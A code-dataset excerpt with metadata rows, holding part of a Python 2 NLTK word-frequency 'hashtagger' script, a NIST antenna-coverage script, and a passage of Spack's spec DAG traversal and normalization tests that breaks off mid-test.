if self.filename.endswith('.txt'):
file = open( self.filename, 'r' )
raw_content = file.read().decode('utf8')
file.close()
else:
file = parser.from_file( self.filename )
# Only interested in the content
raw_content = file['content']
self.content = raw_content
except Exception as e:
logging.warn('%s:FileInterpreter: Failed to read/extract'\
'contents from file %s', script_name, self.filename)
logging.error(e, exc_info=True)
pass
def extract_frequent_words(self, number_of_words=0):
"""
Extract words from content, collect and clean to
produce most frequent words array. Persist in
a set of the word along with its frequency.
"""
if not self.content:
logging.info('%s:FileInterpreter: Cannot compute frequency '\
'of words, file %s content is empty.',
script_name, self.filename)
return
# Parse content and separate words (tokenise words)
# To avoid duplicates, we transform them all to lower case.
tokenized_words = nltk.tokenize.word_tokenize( self.content.lower() )
# Since we are using English, we use stopwords
# defined in the english language.
english_stopwords = nltk.corpus.stopwords.words('english')
# Clean our word collection.
# Exclude stopwords, single-character words and
# non alphabetic.
clean_tokenized_words = ( w.lower()
for w in tokenized_words
if w.isalpha()
if len(w)>1
if w.lower() not in english_stopwords )
# Compute frequency of our clean word collection.
frequency_words = nltk.FreqDist( w.lower()
for w in clean_tokenized_words )
# If a number of words to return is given (n),
if (number_of_words):
# then return the (n) most common words
self.frequent_words = frequency_words.most_common(number_of_words)
else:
# otherwise return all words in ascending order of higher frequency.
self.frequent_words = frequency_words.most_common()
def extract_sentences_of_frequent_words(self):
"""
Extract senteces from content, for each collected
frequent word, match senteces that include it and
persist in an array.
"""
if not self.frequent_words:
logging.info('%s:FileInterpreter: Cannot find sentences of '\
'frequent words, file %s does not have frequent '\
'words.', script_name, self.filename)
return
sentences_of_frequent_words = []
# Parse content and separate sentences (tokenise sentences)
tokenized_sentences = nltk.tokenize.sent_tokenize( self.content )
# For every word we collected as frequent,
for word in self.frequent_words:
# Check if word is included in sentence
word_matched_sentences = [ sentence
for sentence in tokenized_sentences
if word[0] in nltk.tokenize
.word_tokenize( sentence.lower() ) ]
sentences_of_frequent_words.append(word_matched_sentences)
self.sentences_of_frequent_words = sentences_of_frequent_words
class Hashtagger:
"""
Responsible for extracting hashtags
from the FileInterpreter objects, merges
them and generates a table as output.
"""
def __init__(self, file_interpreters=[], hashtags_per_doc=0):
self.file_interpreters = file_interpreters
self.hashtags_per_doc = hashtags_per_doc
self.data_structure = {}
if not file_interpreters:
logging.warn('%s:Hashtagger: Failed to create object,'\
' no file interpreters given', script_name)
else:
# Ready to extract hashtags from FileInterpreter objects.
self.extract_hashtags()
def extract_hashtags(self):
"""
Creates a data structure, that includes
all the words across all the files along with
the files found in, their frequency and their sentences.
"""
# For every file,
for file_interpreter in self.file_interpreters:
# extract frequent words
if self.hashtags_per_doc:
file_interpreter.extract_frequent_words(self.hashtags_per_doc)
else:
file_interpreter.extract_frequent_words()
# and their sentences
file_interpreter.extract_sentences_of_frequent_words()
if ( not file_interpreter.frequent_words or
not file_interpreter.sentences_of_frequent_words ):
logging.info('%s:Hashtagger: Cannot generate hashtags, '\
'frequent words and/or their sentences are '\
'missing. (file: %s)',
script_name, file_interpreter.filename)
return
# For every frequent word,
for index in range( 0, len(file_interpreter.frequent_words) ):
# collect filename, word, frequency and sentences it's included.
file = file_interpreter.filename
word = ( file_interpreter.frequent_words[index][0] ).encode('utf-8')
freq = file_interpreter.frequent_words[index][1]
sentences = file_interpreter.sentences_of_frequent_words[index]
# Persist in a data structure dictionary.
if word in self.data_structure:
# Include new file found
self.data_structure[word][1] = ( self.data_structure[word][1] +
'\n' + file +
' (' + str(freq) + ')' )
# Include new sentences found
self.data_structure[word][2].append(sentences)
else:
# Create a new array of format:
tmp = [ word, file + ' (' + str(freq) + ')', sentences ]
self.data_structure[word] = tmp
def print_findings(self):
"""
Prepare data for a table and display it.
"""
# Specify our table headers as the first array of data.
data = [ ['#','In document (frequency)','Snippets'] ]
if not self.data_structure:
logging.info('%s:Hashtagger: Cannot print table, '\
'data are missing.', script_name)
return
# Append arrays to data array.
for value in self.data_structure.values():
data.append(value)
# Using texttable, draw a table with the
# data array.
viewer = Texttable()
viewer.add_rows(data)
print '\n' + viewer.draw() + '\n'
def main(template_filepath=''):
"""
Creates FileInterpreter objects for every document
found in the given directory (template_filepaht).
Also creates a Hashtagger object to analyse all the
documents and print out a table with findings.
"""
file_interpreters = []
if template_filepath:
# Ommit any system files starting with '.'
template_filenames = [ (template_filepath + '/' + f)
for f in os.listdir( template_filepath )
if not f.startswith('.') ]
if not template_filenames:
logging.warn('%s: Directory contains no documents.', script_name)
return
# For every document listed,
# create a file interpreter object.
for filename in template_filenames:
file_interpreters.append( FileInterpreter(filename) )
# Create hashtagger object to handle documents and print results.
# Hashtagger configured to only extract
# the 10 most common occurring words.
max_words = 10
hashtagger_obj = Hashtagger( file_interpreters, max_words)
hashtagger_obj.print_findings()
else:
logging.warn('%s: Not directory given.', script_name)
if __name__ == '__main__':
start_timer = time.time()
if ( len(sys.argv) != 2 ):
raise Exception( '\nUsage: python {0:} <template_filepath>'\
'\n\twith: <template_filepath> the directory'\
'of the documents to apply hashtags to.\n'
.format(script_name) )
main(sys.argv[1])
end_timer=time.time()
elapsed_time=end_timer-start_timer
logging.info('%s: Executed in %f seconds.',
script_name, elapsed_time)
| 33.351254
| 77
| 0.634605
|
d9538c23afc0b8114d752d003964759024af39a3
| 4,252
|
py
|
Python
|
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | 1
|
2021-02-19T22:22:22.000Z
|
2021-02-19T22:22:22.000Z
|
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | null | null | null |
circlecover/compute_antenna_cover.py
|
usnistgov/esc-antenna-cover
|
1bd391bc8095a2b9b277a453d3b7a19a6300a84c
|
[
"Unlicense"
] | 1
|
2019-11-21T02:38:17.000Z
|
2019-11-21T02:38:17.000Z
|
# This software was developed by employees of the National Institute
# of Standards and Technology (NIST), an agency of the Federal
# Government. Pursuant to title 17 United States Code Section 105, works
# of NIST employees are not subject to copyright protection in the United
# States and are considered to be in the public domain. Permission to freely
# use, copy, modify, and distribute this software and its documentation
# without fee is hereby granted, provided that this notice and disclaimer
# of warranty appears in all copies.
#
# THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT ANY WARRANTY OF ANY KIND,
# EITHER EXPRESSED, IMPLIED, OR STATUTORY, INCLUDING, BUT NOT LIMITED
# TO, ANY WARRANTY THAT THE SOFTWARE WILL CONFORM TO SPECIFICATIONS, ANY
# IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE,
# AND FREEDOM FROM INFRINGEMENT, AND ANY WARRANTY THAT THE DOCUMENTATION
# WILL CONFORM TO THE SOFTWARE, OR ANY WARRANTY THAT THE SOFTWARE WILL BE
# ERROR FREE. IN NO EVENT SHALL NASA BE LIABLE FOR ANY DAMAGES, INCLUDING,
# BUT NOT LIMITED TO, DIRECT, INDIRECT, SPECIAL OR CONSEQUENTIAL DAMAGES,
# ARISING OUT OF, RESULTING FROM, OR IN ANY WAY CONNECTED WITH THIS
# SOFTWARE, WHETHER OR NOT BASED UPON WARRANTY, CONTRACT, TORT, OR
# OTHERWISE, WHETHER OR NOT INJURY WAS SUSTAINED BY PERSONS OR PROPERTY
# OR OTHERWISE, AND WHETHER OR NOT LOSS WAS SUSTAINED FROM, OR AROSE OUT
# OF THE RESULTS OF, OR USE OF, THE SOFTWARE OR SERVICES PROVIDED HEREUNDER.
#
# Distributions of NIST software should also include copyright and licensing
# statements of any third-party software that are legally bundled with
# the code in compliance with the conditions of those licenses.
import antennacover
import excessarea
import argparse
import simannealer
import printcover
if __name__ == "__main__":
# Read and parse the args.
parser = argparse.ArgumentParser()
parser.add_argument("-dist", type=int, default=0, help = "Min sensor spacing (km) default 0")
parser.add_argument("-gs", type=int, default=400, help = "Grid size (default 400)")
parser.add_argument("-pr", help="Definition of protected region units in meters",required=True)
parser.add_argument("-ap", help = "Definition of antenna patterns unit in Km.",required=True)
parser.add_argument("-anneal", type = int, default=0, help="Number of steps to run the annealer")
parser.add_argument("-of",default="output", help = "Output file name prefix")
parser.add_argument("-to",type=float,default=.005, help = "outage tolerance (default = .005)")
args = parser.parse_args()
protection_region = args.pr
do_anneal = args.anneal != 0
coverage_file = args.ap
#min_ctr_dist = args.dist
min_ctr_dist = args.dist
output_file = args.of
grid_size = args.gs
tol = args.to
antennacover.NDIVISIONS=grid_size
# Load up the data.
with open (protection_region, "r") as myfile:
data=myfile.readlines()
# Units are in Km. This should be converted to json format.
esc_loc_x = [x/1000.0 for x in eval(data[0])]
esc_loc_y = [x/1000.0 for x in eval(data[1])]
ship_loc_x = [x/1000.0 for x in eval(data[2])]
ship_loc_y = [x/1000.0 for x in eval(data[3])]
possible_centers = []
for i in range(0,len(esc_loc_x)):
center = (esc_loc_x[i],esc_loc_y[i])
possible_centers.append(center)
interference_contour = []
for i in range(0,len(ship_loc_x)):
p = (ship_loc_x[i],ship_loc_y[i])
interference_contour.append(p)
bounding_polygon = excess_area.generate_bounding_polygon(possible_centers,interference_contour)
testName = output_file
cover = antennacover.min_antenna_area_cover_greedy(possible_centers, bounding_polygon, coverage_file, min_center_distance=min_ctr_dist,tol=tol)
printcover.printAntennaCover(output_file,bounding_polygon, possible_centers, cover,coverage_file,min_ctr_dist)
if do_anneal:
annealr = simannealer.SimAnneal(bounding_polygon, possible_centers, coverage_file,cover,steps=args.anneal,tol=tol)
annealr.anneal()
cover = annealr.get_result()
printcover.printAntennaCover(output_file + "Anneal", bounding_polygon, possible_centers, cover,coverage_file,min_ctr_dist)
| 48.873563
| 147
| 0.742239
|
080f26000d833a55f84b4e1565db72fd73295f9d
| 32,753
|
py
|
Python
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2018-11-16T02:42:57.000Z
|
2019-06-06T19:18:50.000Z
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 32
|
2020-12-15T17:29:20.000Z
|
2022-03-21T15:08:31.000Z
|
lib/spack/spack/test/spec_dag.py
|
mtmiller/spack
|
c97c135f1dbe24955048fcc4f0f98281ef0c9300
|
[
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | 2
|
2021-07-19T20:31:27.000Z
|
2021-07-19T21:14:14.000Z
|
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
"""
These tests check Spec DAG operations using dummy packages.
"""
import pytest
import spack.architecture
import spack.error
import spack.package
import spack.util.hash as hashutil
from spack.dependency import Dependency, all_deptypes, canonical_deptype
from spack.spec import Spec
from spack.util.mock_package import MockPackageMultiRepo
def check_links(spec_to_check):
for spec in spec_to_check.traverse():
for dependent in spec.dependents():
assert spec.name in dependent.dependencies_dict()
for dependency in spec.dependencies():
assert spec.name in dependency.dependents_dict()
@pytest.fixture()
def saved_deps():
"""Returns a dictionary to save the dependencies."""
return {}
@pytest.fixture()
def set_dependency(saved_deps):
"""Returns a function that alters the dependency information
for a package in the ``saved_deps`` fixture.
"""
def _mock(pkg_name, spec, deptypes=all_deptypes):
"""Alters dependence information for a package.
Adds a dependency on <spec> to pkg. Use this to mock up constraints.
"""
spec = Spec(spec)
# Save original dependencies before making any changes.
pkg = spack.repo.get(pkg_name)
if pkg_name not in saved_deps:
saved_deps[pkg_name] = (pkg, pkg.dependencies.copy())
cond = Spec(pkg.name)
dependency = Dependency(pkg, spec, type=deptypes)
pkg.dependencies[spec.name] = {cond: dependency}
return _mock
@pytest.mark.usefixtures('config')
def test_test_deptype():
"""Ensure that test-only dependencies are only included for specified
packages in the following spec DAG::
w
/|
x y
|
z
w->y deptypes are (link, build), w->x and y->z deptypes are (test)
"""
default = ('build', 'link')
test_only = ('test',)
mock_repo = MockPackageMultiRepo()
x = mock_repo.add_package('x', [], [])
z = mock_repo.add_package('z', [], [])
y = mock_repo.add_package('y', [z], [test_only])
w = mock_repo.add_package('w', [x, y], [test_only, default])
with spack.repo.use_repositories(mock_repo):
spec = Spec('w')
spec.concretize(tests=(w.name,))
assert ('x' in spec)
assert ('z' not in spec)
@pytest.mark.usefixtures('config')
def test_installed_deps():
"""Preinstall a package P with a constrained build dependency D, then
concretize a dependent package which also depends on P and D, specifying
that the installed instance of P should be used. In this case, D should
not be constrained by P since P is already built.
"""
# FIXME: this requires to concretize build deps separately if we are
# FIXME: using the clingo based concretizer
if spack.config.get('config:concretizer') == 'clingo':
pytest.xfail('requires separate concretization of build dependencies')
default = ('build', 'link')
build_only = ('build',)
mock_repo = MockPackageMultiRepo()
e = mock_repo.add_package('e', [], [])
d = mock_repo.add_package('d', [], [])
c_conditions = {
d.name: {
'c': 'd@2'
},
e.name: {
'c': 'e@2'
}
}
c = mock_repo.add_package('c', [d, e], [build_only, default],
conditions=c_conditions)
b = mock_repo.add_package('b', [d, e], [default, default])
mock_repo.add_package('a', [b, c], [default, default])
with spack.repo.use_repositories(mock_repo):
c_spec = Spec('c')
c_spec.concretize()
assert c_spec['d'].version == spack.version.Version('2')
c_installed = spack.spec.Spec.from_dict(c_spec.to_dict())
for spec in c_installed.traverse():
setattr(spec.package, 'installed', True)
a_spec = Spec('a')
a_spec._add_dependency(c_installed, default)
a_spec.concretize()
assert a_spec['d'].version == spack.version.Version('3')
assert a_spec['e'].version == spack.version.Version('2')
@pytest.mark.usefixtures('config')
def test_specify_preinstalled_dep():
"""Specify the use of a preinstalled package during concretization with a
transitive dependency that is only supplied by the preinstalled package.
"""
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
c = mock_repo.add_package('c', [], [])
b = mock_repo.add_package('b', [c], [default])
mock_repo.add_package('a', [b], [default])
with spack.repo.use_repositories(mock_repo):
b_spec = Spec('b')
b_spec.concretize()
for spec in b_spec.traverse():
setattr(spec.package, 'installed', True)
a_spec = Spec('a')
a_spec._add_dependency(b_spec, default)
a_spec.concretize()
assert set(x.name for x in a_spec.traverse()) == set(['a', 'b', 'c'])
@pytest.mark.usefixtures('config')
@pytest.mark.parametrize('spec_str,expr_str,expected', [
('x ^y@2', 'y@2', True),
('x@1', 'y', False),
('x', 'y@3', True)
])
def test_conditional_dep_with_user_constraints(spec_str, expr_str, expected):
"""This sets up packages X->Y such that X depends on Y conditionally. It
then constructs a Spec with X but with no constraints on X, so that the
initial normalization pass cannot determine whether the constraints are
met to add the dependency; this checks whether a user-specified constraint
on Y is applied properly.
"""
# FIXME: We need to tweak optimization rules to make this test
# FIXME: not prefer a DAG with fewer nodes wrt more recent
# FIXME: versions of the package
if spack.config.get('config:concretizer') == 'clingo':
pytest.xfail('Clingo optimization rules prefer to trim a node')
default = ('build', 'link')
mock_repo = MockPackageMultiRepo()
y = mock_repo.add_package('y', [], [])
x_on_y_conditions = {
y.name: {
'x@2:': 'y'
}
}
mock_repo.add_package('x', [y], [default], conditions=x_on_y_conditions)
with spack.repo.use_repositories(mock_repo):
spec = Spec(spec_str)
spec.concretize()
result = expr_str in spec
assert result is expected, '{0} in {1}'.format(expr_str, spec)
@pytest.mark.usefixtures('mutable_mock_repo', 'config')
class TestSpecDag(object):
def test_conflicting_package_constraints(self, set_dependency):
set_dependency('mpileaks', 'mpich@1.0')
set_dependency('callpath', 'mpich@2.0')
spec = Spec('mpileaks ^mpich ^callpath ^dyninst ^libelf ^libdwarf')
# TODO: try to do something to show that the issue was with
# TODO: the user's input or with package inconsistencies.
with pytest.raises(spack.spec.UnsatisfiableVersionSpecError):
spec.normalize()
def test_preorder_node_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'zmpi', 'fake']
pairs = list(zip([0, 1, 2, 3, 4, 2, 3], names))
traversal = dag.traverse()
assert [x.name for x in traversal] == names
traversal = dag.traverse(depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_preorder_edge_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'libelf', 'zmpi', 'fake', 'zmpi']
pairs = list(zip([0, 1, 2, 3, 4, 3, 2, 3, 1], names))
traversal = dag.traverse(cover='edges')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='edges', depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_preorder_path_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['mpileaks', 'callpath', 'dyninst', 'libdwarf', 'libelf',
'libelf', 'zmpi', 'fake', 'zmpi', 'fake']
pairs = list(zip([0, 1, 2, 3, 4, 3, 2, 3, 1, 2], names))
traversal = dag.traverse(cover='paths')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='paths', depth=True)
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_node_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'dyninst', 'fake', 'zmpi',
'callpath', 'mpileaks']
pairs = list(zip([4, 3, 2, 3, 2, 1, 0], names))
traversal = dag.traverse(order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_edge_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'libelf', 'dyninst', 'fake', 'zmpi',
'callpath', 'zmpi', 'mpileaks']
pairs = list(zip([4, 3, 3, 2, 3, 2, 1, 1, 0], names))
traversal = dag.traverse(cover='edges', order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='edges', depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_postorder_path_traversal(self):
dag = Spec('mpileaks ^zmpi')
dag.normalize()
names = ['libelf', 'libdwarf', 'libelf', 'dyninst', 'fake', 'zmpi',
'callpath', 'fake', 'zmpi', 'mpileaks']
pairs = list(zip([4, 3, 3, 2, 3, 2, 1, 2, 1, 0], names))
traversal = dag.traverse(cover='paths', order='post')
assert [x.name for x in traversal] == names
traversal = dag.traverse(cover='paths', depth=True, order='post')
assert [(x, y.name) for x, y in traversal] == pairs
def test_conflicting_spec_constraints(self):
mpileaks = Spec('mpileaks ^mpich ^callpath ^dyninst ^libelf ^libdwarf')
# Normalize then add conflicting constraints to the DAG (this is an
# extremely unlikely scenario, but we test for it anyway)
mpileaks.normalize()
mpileaks._dependencies['mpich'].spec = Spec('mpich@1.0')
mpileaks._dependencies['callpath']. \
spec._dependencies['mpich'].spec = Spec('mpich@2.0')
with pytest.raises(spack.spec.InconsistentSpecError):
mpileaks.flat_dependencies(copy=False)
def test_normalize_twice(self):
"""Make sure normalize can be run twice on the same spec,
and that it is idempotent."""
spec = Spec('mpileaks')
spec.normalize()
n1 = spec.copy()
spec.normalize()
assert n1 == spec
def test_normalize_a_lot(self):
spec = Spec('mpileaks')
spec.normalize()
spec.normalize()
spec.normalize()
spec.normalize()
def test_normalize_with_virtual_spec(self, ):
dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf': None},
'libelf': None
},
'mpi': None
},
'mpi': None
}
})
dag.normalize()
# make sure nothing with the same name occurs twice
counts = {}
for spec in dag.traverse(key=id):
if spec.name not in counts:
counts[spec.name] = 0
counts[spec.name] += 1
for name in counts:
assert counts[name] == 1
def test_dependents_and_dependencies_are_correct(self):
spec = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf': None},
'libelf': None
},
'mpi': None
},
'mpi': None
}
})
check_links(spec)
spec.normalize()
check_links(spec)
def test_unsatisfiable_version(self, set_dependency):
set_dependency('mpileaks', 'mpich@1.0')
spec = Spec('mpileaks ^mpich@2.0 ^callpath ^dyninst ^libelf ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableVersionSpecError):
spec.normalize()
def test_unsatisfiable_compiler(self, set_dependency):
set_dependency('mpileaks', 'mpich%gcc')
spec = Spec('mpileaks ^mpich%intel ^callpath ^dyninst ^libelf'
' ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableCompilerSpecError):
spec.normalize()
def test_unsatisfiable_compiler_version(self, set_dependency):
set_dependency('mpileaks', 'mpich%gcc@4.6')
spec = Spec('mpileaks ^mpich%gcc@4.5 ^callpath ^dyninst ^libelf'
' ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableCompilerSpecError):
spec.normalize()
def test_unsatisfiable_architecture(self, set_dependency):
set_dependency('mpileaks', 'mpich platform=test target=be')
spec = Spec('mpileaks ^mpich platform=test target=fe ^callpath'
' ^dyninst ^libelf ^libdwarf')
with pytest.raises(spack.spec.UnsatisfiableArchitectureSpecError):
spec.normalize()
@pytest.mark.parametrize('spec_str', [
'libelf ^mpich', 'libelf ^libdwarf', 'mpich ^dyninst ^libelf'
])
def test_invalid_dep(self, spec_str):
spec = Spec(spec_str)
with pytest.raises(spack.error.SpecError):
spec.concretize()
def test_equal(self):
# Different spec structures to test for equality
flat = Spec.from_literal(
{'mpileaks ^callpath ^libelf ^libdwarf': None}
)
flat_init = Spec.from_literal({
'mpileaks': {
'callpath': None,
'libdwarf': None,
'libelf': None
}
})
flip_flat = Spec.from_literal({
'mpileaks': {
'libelf': None,
'libdwarf': None,
'callpath': None
}
})
dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'libdwarf': {
'libelf': None
}
}
}
})
flip_dag = Spec.from_literal({
'mpileaks': {
'callpath': {
'libelf': {
'libdwarf': None
}
}
}
})
# All these are equal to each other with regular ==
specs = (flat, flat_init, flip_flat, dag, flip_dag)
for lhs, rhs in zip(specs, specs):
assert lhs == rhs
assert str(lhs) == str(rhs)
# Same DAGs constructed different ways are equal
assert flat.eq_dag(flat_init)
# order at same level does not matter -- (dep on same parent)
assert flat.eq_dag(flip_flat)
# DAGs should be unequal if nesting is different
assert not flat.eq_dag(dag)
assert not flat.eq_dag(flip_dag)
assert not flip_flat.eq_dag(dag)
assert not flip_flat.eq_dag(flip_dag)
assert not dag.eq_dag(flip_dag)
def test_normalize_mpileaks(self):
# Spec parsed in from a string
spec = Spec.from_literal({
'mpileaks ^mpich ^callpath ^dyninst ^libelf@1.8.11 ^libdwarf': None
})
# What that spec should look like after parsing
expected_flat = Spec.from_literal({
'mpileaks': {
'mpich': None,
'callpath': None,
'dyninst': None,
'libelf@1.8.11': None,
'libdwarf': None
}
})
# What it should look like after normalization
mpich = Spec('mpich')
libelf = Spec('libelf@1.8.11')
expected_normalized = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {libelf: None},
libelf: None
},
mpich: None
},
mpich: None
},
})
# Similar to normalized spec, but now with copies of the same
# libelf node. Normalization should result in a single unique
# node for each package, so this is the wrong DAG.
non_unique_nodes = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf@1.8.11': None},
'libelf@1.8.11': None
},
mpich: None
},
mpich: None
}
}, normal=False)
# All specs here should be equal under regular equality
specs = (spec, expected_flat, expected_normalized, non_unique_nodes)
for lhs, rhs in zip(specs, specs):
assert lhs == rhs
assert str(lhs) == str(rhs)
# Test that equal and equal_dag are doing the right thing
assert spec == expected_flat
assert spec.eq_dag(expected_flat)
# Normalized has different DAG structure, so NOT equal.
assert spec != expected_normalized
assert not spec.eq_dag(expected_normalized)
# Again, different DAG structure so not equal.
assert spec != non_unique_nodes
assert not spec.eq_dag(non_unique_nodes)
spec.normalize()
# After normalizing, spec_dag_equal should match the normalized spec.
assert spec != expected_flat
assert not spec.eq_dag(expected_flat)
# verify DAG structure without deptypes.
assert spec.eq_dag(expected_normalized, deptypes=False)
assert not spec.eq_dag(non_unique_nodes, deptypes=False)
assert not spec.eq_dag(expected_normalized, deptypes=True)
assert not spec.eq_dag(non_unique_nodes, deptypes=True)
def test_normalize_with_virtual_package(self):
spec = Spec('mpileaks ^mpi ^libelf@1.8.11 ^libdwarf')
spec.normalize()
expected_normalized = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf@1.8.11': None},
'libelf@1.8.11': None
},
'mpi': None
},
'mpi': None
}
})
assert str(spec) == str(expected_normalized)
def test_contains(self):
spec = Spec('mpileaks ^mpi ^libelf@1.8.11 ^libdwarf')
assert Spec('mpi') in spec
assert Spec('libelf') in spec
assert Spec('libelf@1.8.11') in spec
assert Spec('libelf@1.8.12') not in spec
assert Spec('libdwarf') in spec
assert Spec('libgoblin') not in spec
assert Spec('mpileaks') in spec
def test_copy_simple(self):
orig = Spec('mpileaks')
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
def test_copy_normalized(self):
orig = Spec('mpileaks')
orig.normalize()
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
def test_copy_concretized(self):
orig = Spec('mpileaks')
orig.concretize()
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
"""
Here is the graph with deptypes labeled (assume all packages have a 'dt'
prefix). Arrows are marked with the deptypes ('b' for 'build', 'l' for
'link', 'r' for 'run').
use -bl-> top
top -b-> build1
top -bl-> link1
top -r-> run1
build1 -b-> build2
build1 -bl-> link2
build1 -r-> run2
link1 -bl-> link3
run1 -bl-> link5
run1 -r-> run3
link3 -b-> build2
link3 -bl-> link4
run3 -b-> build3
"""
def test_deptype_traversal(self):
dag = Spec('dtuse')
dag.normalize()
names = ['dtuse', 'dttop', 'dtbuild1', 'dtbuild2', 'dtlink2',
'dtlink1', 'dtlink3', 'dtlink4']
traversal = dag.traverse(deptype=('build', 'link'))
assert [x.name for x in traversal] == names
def test_deptype_traversal_with_builddeps(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtbuild1', 'dtbuild2', 'dtlink2',
'dtlink1', 'dtlink3', 'dtlink4']
traversal = dag.traverse(deptype=('build', 'link'))
assert [x.name for x in traversal] == names
def test_deptype_traversal_full(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtbuild1', 'dtbuild2', 'dtlink2', 'dtrun2',
'dtlink1', 'dtlink3', 'dtlink4', 'dtrun1', 'dtlink5',
'dtrun3', 'dtbuild3']
traversal = dag.traverse(deptype=all)
assert [x.name for x in traversal] == names
def test_deptype_traversal_run(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtrun1', 'dtrun3']
traversal = dag.traverse(deptype='run')
assert [x.name for x in traversal] == names
def test_hash_bits(self):
"""Ensure getting first n bits of a base32-encoded DAG hash works."""
# RFC 4648 base32 decode table
b32 = dict((j, i) for i, j in enumerate('abcdefghijklmnopqrstuvwxyz'))
b32.update(dict((j, i) for i, j in enumerate('234567', 26)))
# some package hashes
tests = [
'35orsd4cenv743hg4i5vxha2lzayycby',
'6kfqtj7dap3773rxog6kkmoweix5gpwo',
'e6h6ff3uvmjbq3azik2ckr6ckwm3depv',
'snz2juf4ij7sv77cq3vs467q6acftmur',
'4eg47oedi5bbkhpoxw26v3oe6vamkfd7',
'vrwabwj6umeb5vjw6flx2rnft3j457rw']
for test_hash in tests:
# string containing raw bits of hash ('1' and '0')
expected = ''.join([format(b32[c], '#07b').replace('0b', '')
for c in test_hash])
for bits in (1, 2, 3, 4, 7, 8, 9, 16, 64, 117, 128, 160):
actual_int = hashutil.base32_prefix_bits(test_hash, bits)
fmt = "#0%sb" % (bits + 2)
actual = format(actual_int, fmt).replace('0b', '')
assert expected[:bits] == actual
with pytest.raises(ValueError):
hashutil.base32_prefix_bits(test_hash, 161)
with pytest.raises(ValueError):
hashutil.base32_prefix_bits(test_hash, 256)
def test_traversal_directions(self):
"""Make sure child and parent traversals of specs work."""
# Mock spec - d is used for a diamond dependency
spec = Spec.from_literal({
'a': {
'b': {
'c': {'d': None},
'e': None
},
'f': {
'g': {'d': None}
}
}
})
assert (
['a', 'b', 'c', 'd', 'e', 'f', 'g'] ==
[s.name for s in spec.traverse(direction='children')])
assert (
['g', 'f', 'a'] ==
[s.name for s in spec['g'].traverse(direction='parents')])
assert (
['d', 'c', 'b', 'a', 'g', 'f'] ==
[s.name for s in spec['d'].traverse(direction='parents')])
def test_edge_traversals(self):
"""Make sure child and parent traversals of specs work."""
# Mock spec - d is used for a diamond dependency
spec = Spec.from_literal({
'a': {
'b': {
'c': {'d': None},
'e': None
},
'f': {
'g': {'d': None}
}
}
})
assert (
['a', 'b', 'c', 'd', 'e', 'f', 'g'] ==
[s.name for s in spec.traverse(direction='children')])
assert (
['g', 'f', 'a'] ==
[s.name for s in spec['g'].traverse(direction='parents')])
assert (
['d', 'c', 'b', 'a', 'g', 'f'] ==
